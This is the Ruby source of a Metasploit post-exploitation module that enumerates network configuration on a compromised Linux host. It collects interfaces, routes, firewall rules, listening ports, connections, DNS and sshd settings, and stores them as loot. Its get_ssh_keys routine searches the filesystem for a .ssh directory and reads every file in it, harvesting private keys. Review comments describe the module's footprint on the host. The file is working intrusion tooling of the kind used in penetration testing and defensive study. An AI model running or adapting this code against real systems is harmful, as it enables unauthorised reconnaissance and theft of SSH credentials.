Path: blob/master/modules/post/linux/gather/enum_network.rb
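##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that collects network-related configuration from a Linux
# session and stores each item as loot of type 'linux.enum.network'.
#
# Footprint on the inspected host, as visible in this file:
# * Commands run through #execute get ` || echo <8 random letters>` appended,
#   so process-creation and audit logs show the listed binaries with that
#   suffix on the command line.
# * #get_ssh_keys runs `/usr/bin/find / -maxdepth 3 -name .ssh` directly via
#   cmd_exec (no suffix) and then reads every entry of the first match.
# * Files read: /etc/resolv.conf, /etc/ssh/sshd_config, /etc/hosts and the
#   contents of that .ssh directory.
#
# NOTE(review): what comes back is presumably bounded by what the session user
# may execute and read; restrictive permissions on ~/.ssh and on sshd_config
# would limit the result. Confirm against cmd_exec / read_file.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  # Registers the module metadata (name, description, authors, platform and
  # supported session types) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather Network Information',
        'Description' => %q{
          This module gathers network information from the target system
          IPTables rules, interfaces, wireless information, open and listening
          ports, active network connections, DNS information and SSH information.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )
  end

  # Entry point for the `run` command: prints host and user context, collects
  # every data source, then stores each result with #save.
  def run
    print_status("Running module against #{get_hostname} (#{session.session_host})")

    user = execute('/usr/bin/whoami')
    print_status("Module running as #{user}")

    # Collect data
    distro = get_sysinfo
    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    print_status('Collecting data...')

    # Each execute call yields nil when the command fails; #save reports that
    # case instead of storing anything.
    nconfig = execute('/sbin/ifconfig -a')
    routes = execute('/sbin/route -e')
    iptables = execute('/sbin/iptables -L')
    iptables_nat = execute('/sbin/iptables -L -t nat')
    iptables_man = execute('/sbin/iptables -L -t mangle')
    resolv = cat_file('/etc/resolv.conf')
    sshd_conf = cat_file('/etc/ssh/sshd_config')
    hosts = cat_file('/etc/hosts')
    connections = execute('/usr/bin/lsof -nPi')
    wireless = execute('/sbin/iwconfig')
    open_ports = execute('/bin/netstat -tulpn')
    updown = execute('ls -R /etc/network')

    ssh_keys = get_ssh_keys

    # Save Enumerated data
    save('Network config', nconfig)
    save('Route table', routes)
    # to_s turns a failed (nil) table listing into '' so the three tables can
    # still be concatenated.
    save('Firewall config', iptables.to_s + iptables_nat.to_s + iptables_man.to_s)
    save('DNS config', resolv)
    save('SSHD config', sshd_conf)
    save('Host file', hosts)
    save('SSH keys', ssh_keys) unless ssh_keys.empty?
    save('Active connections', connections)
    save('Wireless information', wireless)
    save('Listening ports', open_ports)
    save('If-Up/If-Down', updown)
  end

  # Stores one collected item as loot, or reports that nothing was collected.
  #
  # @param msg [String] label used in status output and passed to store_loot
  # @param data [String, Array, nil] collected content; nil or empty is reported and skipped
  # @param ctype [String] content type handed to store_loot
  def save(msg, data, ctype = 'text/plain')
    if !data || data.empty?
      print_bad("Unable to get data for #{msg}")
      return
    end

    ltype = 'linux.enum.network'
    # store_loot's return value is printed below as the storage location.
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_good("#{msg} stored in #{loot}")
  end

  # Runs a command in the session and detects failure with a random marker.
  #
  # The command line is suffixed with `|| echo <token>`, so the token only
  # appears in the output when the command exits non-zero.
  #
  # @param cmd [String] command line to run
  # @return [String, nil] command output, or nil when the token was echoed
  def execute(cmd)
    verification_token = Rex::Text.rand_text_alpha(8)
    vprint_status("Execute: #{cmd}")
    output = cmd_exec(cmd + " || echo #{verification_token}")
    return nil if output.include?(verification_token)

    output
  end

  # Reads a file from the session via read_file.
  #
  # @param filename [String] path of the file to read
  # @return [String, nil] whatever read_file returns for that path
  def cat_file(filename)
    vprint_status("Download: #{filename}")
    read_file(filename)
  end

  # Reads every entry of the first .ssh directory found within three levels
  # of the filesystem root.
  #
  # Only the first path matching the pattern is used. The directory listing is
  # split on whitespace and the path is interpolated unquoted, so names with
  # spaces are not handled.
  #
  # @return [Array<String>] contents of the files that could be read; empty
  #   when no directory was found or the listing failed
  def get_ssh_keys
    keys = []

    # Look for .ssh folder, "~/" might not work everytime
    vprint_status('Execute: /usr/bin/find / -maxdepth 3 -name .ssh')
    dirs = cmd_exec('/usr/bin/find / -maxdepth 3 -name .ssh').split("\n")
    ssh_base = dirs.find { |d| d =~ %r{(^/)(.*)\.ssh$} }

    # We didn't find .ssh :-(
    return [] if ssh_base.nil?

    # List all the files under .ssh/
    # execute returns nil when ls fails; calling chomp on that nil used to
    # raise NoMethodError and abort run before anything was saved.
    listing = execute("/bin/ls -a #{ssh_base}")
    return [] if listing.nil?

    listing.chomp.split.each do |k|
      # Skip the '.' and '..' entries.
      next if k =~ /^(\.+)$/

      this_key = cat_file("#{ssh_base}/#{k}")
      # Unreadable or empty entries would otherwise put nil / '' into the result.
      keys << this_key unless this_key.to_s.empty?
    end

    keys
  end
end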